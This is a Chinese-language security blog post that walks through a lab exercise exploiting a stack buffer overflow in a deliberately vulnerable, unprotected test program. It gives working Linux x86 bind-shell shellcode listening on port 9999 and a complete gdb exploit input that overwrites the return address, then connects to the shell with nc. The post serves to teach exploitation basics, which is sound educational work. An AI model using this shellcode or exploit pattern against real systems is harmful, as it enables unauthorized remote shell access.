<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-us">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  
  <meta name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1">

  
    
    
      <link href="/css/fonts.css" rel="stylesheet" type="text/css">
    
  

  
  <title>Buffer Overflow</title>

  
  
  <link rel="stylesheet" href="/css/hugo-octopress.css">

  
  

  
    <link rel="stylesheet" href="/css/fork-awesome.min.css">
  

  
  <link href="https://GETC2.github.io/favicon.png" rel="icon">

  
  

  <meta name="description" content="" />
  <meta name="keywords" content="">
  <meta name="author" content="KUHAKU">

  
  <meta name="generator" content="Hugo 0.78.0" />

  
  

  
  
</head>
<body>


<header role="banner">
<hgroup>
  
  <h1><a href="https://GETC2.github.io/">GET command and control</a></h1>
    <h2>Stay hungry. Stay foolish.</h2>
</hgroup></header>


<nav role="navigation">
<fieldset class="mobile-nav">
  
  <select onchange="location = this.value;">
    <option value="">Navigate…</option>
      
  </select>
</fieldset>


<ul class="main-navigation">
  
  
</ul>

<ul class="subscription">
  
</ul>


</nav>


<div id="main">
  <div id="content">
    <div>
      <article class="hentry" role="article">

        
        

<header>
  <p class="meta">Feb 21, 2021
     - 3 minute read 
    

    
    
      - <a class="label" href="https://GETC2.github.io/categories/reverse-engineering/">Reverse Engineering </a>
    
  </p>
  <h1 class="entry-title">
     Buffer Overflow 
  </h1>
</header>


        <div class="entry-content">
          
          
          
          <h1 id="栈溢出1">栈溢出(1)</h1>
<p>说到漏洞很容易让人联想到栈溢出，这也说明了栈溢出的普遍性。正因为如此，针对栈溢出的<code>mitigation</code>也很多：</p>
<ul>
<li>编译时的<code>ASLR</code>, <code>DEP</code>, <code>LFH</code></li>
<li>操作系统的<code>Canaries</code>, <code>SafeSEH</code></li>
</ul>
<p>针对这些措施，也有相应的办法绕过。这里纯粹记录一下从最基本的栈溢出到如何绕过带保护措施进而成功利用栈溢出。</p>
<h2 id="实验">实验</h2>
<h3 id="目标">目标</h3>
<p>针对存在栈溢出漏洞的程序<code>password</code>，成功利用。此程序以及操作系统不带任何针对栈溢出的保护措施。</p>
<h3 id="步骤">步骤</h3>
<p>首先说明这个程序的功能，该程序接受密码参数，会根据正确与否输出不同的提示：</p>
<p><img src="https://cdn.jsdelivr.net/gh/GETC2/blog-pics@master/img/Snipaste_2021-02-21_21-05-46.png" alt=""></p>
<p>为了证明这个程序有栈溢出漏洞，我们可以直接依靠<code>python</code>生成输入进行测试：</p>
<p><img src="https://cdn.jsdelivr.net/gh/GETC2/blog-pics@master/img/Snipaste_2021-02-21_21-08-44.png" alt=""></p>
<p>如图所示，利用<code>python</code>生成长字符串作为程序的输入，结果出现段错误，这说明该程序的确有栈溢出漏洞。其实我们也可以用之前介绍过的<code>AFL</code>进行<code>fuzzing</code>，不过针对这样的程序有点杀鸡用牛刀的感觉。</p>
<p>接下来为了利用这个漏洞，我们需要搞清楚程序分配的缓冲区大小。因为搞清楚缓冲区大小之后，我们才可以知道：</p>
<ul>
<li>缓冲区是否足够容纳<code>shellcode</code></li>
<li>返回指针相对缓冲区的距离，<code>shellcode</code>的地址应该置于何处</li>
</ul>
<p>我们可以通过观察反汇编来猜测缓冲区大小：</p>
<p><img src="https://cdn.jsdelivr.net/gh/GETC2/blog-pics@master/img/Snipaste_2021-02-21_21-16-16.png" alt=""></p>
<p>从<code>main</code>函数看，并没有直接分配缓冲区并接受用户输入的函数调用，但是我们看到了对函数<code>checkpw</code> 的调用，我们可以观察这个函数：</p>
<p><img src="https://cdn.jsdelivr.net/gh/GETC2/blog-pics@master/img/Snipaste_2021-02-21_21-16-48.png" alt=""></p>
<p>可以看到在这个函数里调用了<code>gets</code>函数，而前面两行：</p>
<pre><code>lea -0x260(%epb),%eax
mov %eax,(%esp)
</code></pre><p>应该是为<code>gets</code>函数设置指向缓冲区的参数，根据指令我们可以推断分配的缓冲区为608-4-4=600字节，因为608字节应该包括了之前入栈的%edi, %esi的值。608字节之后就是保存的上一个帧栈的%ebp，以及返回指针。</p>
<p>如果从源码无法有效推断缓冲区的大小，我们可以借助<code>metasploit</code>中的脚本来推断：<code>pattern_create.rb, pattern_offset.rb</code>。第一个脚本可以根据指定的长度生成字符串，利用这个字符串作为输入造成段错误，其中%eip的值一定来自于这个字符串，且这个值在字符串中只出现一次，因此我们可以利用这个值的<code>offset</code>来确定缓冲区的大小。</p>
<p>了解了缓冲区的长度后，我们就可以生成<code>shellcode</code>进行漏洞利用了。这里我们直接使用现成的<code>shellcode</code>：</p>
<pre><code>\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
</code></pre><p>这个<code>shellcode</code>在端口9999监听。下面就是结合了<code>shellcode</code>和<code>exploit</code>的输入：</p>
<pre><code>(gdb) run &lt; &lt;(python -c 'print &quot;A&quot;*200 + &quot;\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80&quot; + &quot;A&quot;*328 + &quot;\x10\xF1\xFF\xBF&quot;')
</code></pre><p>输入的前200个字符是<code>A</code>，后面是84个字节的<code>shellcode</code>，后面的328个字节也是<code>A</code>，这些总共612个字节，这之后的四个字节正好覆盖了返回指针。通过反汇编，我们知道<code>checkpw</code>的%ebp指向<code>0xbffff2a8</code>, 而分配的缓冲区的开头需要从%ebp中减去608，由于<code>shellcode</code>的<code>offset</code>是200，所以最终的<code>shellcode</code>的位置是<code>0xbffff110</code>，由于x86是小端法，所以<code>exploit</code>中的返回指针需要逆向输入。</p>
<p>利用之后，我们可以是用<code>nc</code>连接：</p>
<p><img src="https://cdn.jsdelivr.net/gh/GETC2/blog-pics@master/img/Snipaste_2021-02-22_08-57-25.png" alt=""></p>
<p><img src="https://cdn.jsdelivr.net/gh/GETC2/blog-pics@master/img/Snipaste_2021-02-22_08-58-10.png" alt=""></p>
<p>可以发现，我们成功利用了缓冲区漏洞得到了<code>shell</code>。现实中，由于缓冲区可能会产生变化，所以一般会在输入前面使用<code>NOP</code>，而不是简单的字符串，这样我们就可以随便选择<code>NOP</code>所在的地址，从而提高成功率。</p>
<h2 id="总结">总结</h2>
<p>这里我们展示了如何利用最基本的栈溢出漏洞，漏洞程序没有任何的保护措施。这之后，我们可以加上保护措施，研究如何绕过这些措施并利用漏洞。</p>

        </div>
        

<footer>
  <p class="meta">
    <span class="byline author vcard">Posted by <span class="fn">KUHAKU</span></span>
    
    <time>Feb 21, 2021</time>
    
    </span>
  </p>

  

  <p class="meta">
    
        <a class="basic-alignment left" href="https://GETC2.github.io/post/afl-fuzzing/" title="AFL Fuzzing">AFL Fuzzing</a>
    

    
      <a class="basic-alignment right" href="https://GETC2.github.io/post/buffer-overflow2/" title="Buffer Overflow(2)">Buffer Overflow(2)</a>
    
  </p>
  
</footer>

      </article>
    </div>
    

<aside class="sidebar thirds">
  <section class="first odd">

    

    <p>
      
    </p>
  </section>



  
  <ul class="sidebar-nav">
    <li class="sidebar-nav-item">
      
      
      
      
      
         
      
      
      
      
      
      
      

    
    
    </li>
  </ul>

  

  
    
      <section class="odd">
        
          <h1>分类</h1>
        
        
          <li>
            <a href="https://GETC2.github.io/categories/cryptography/" title="Cryptography" >Cryptography</a>
          </li>
        
          <li>
            <a href="https://GETC2.github.io/categories/php/" title="PHP" >PHP</a>
          </li>
        
          <li>
            <a href="https://GETC2.github.io/categories/purple-team/" title="Purple Team" >Purple Team</a>
          </li>
        
          <li>
            <a href="https://GETC2.github.io/categories/red-team/" title="Red Team" >Red Team</a>
          </li>
        
          <li>
            <a href="https://GETC2.github.io/categories/reverse-engineering/" title="Reverse Engineering" >Reverse Engineering</a>
          </li>
        
          <li>
            <a href="https://GETC2.github.io/categories/web-pentesting/" title="Web Pentesting" >Web Pentesting</a>
          </li>
        
      </section>
    
  

  
  
  
</aside>

  </div>
</div>

    <footer role="contentinfo">
      <p>Copyright &copy; 2021 KUHAKU - <a href="https://GETC2.github.io/license/">License</a> -
        <span class="credit">Powered by <a target="_blank" href="https://gohugo.io" rel="noopener noreferrer">Hugo</a> and <a target="_blank" href="https://github.com/parsiya/hugo-octopress/" rel="noopener noreferrer">Hugo-Octopress</a> theme.
      </p>
    </footer>

    
    
    

    
  </body>
</html>

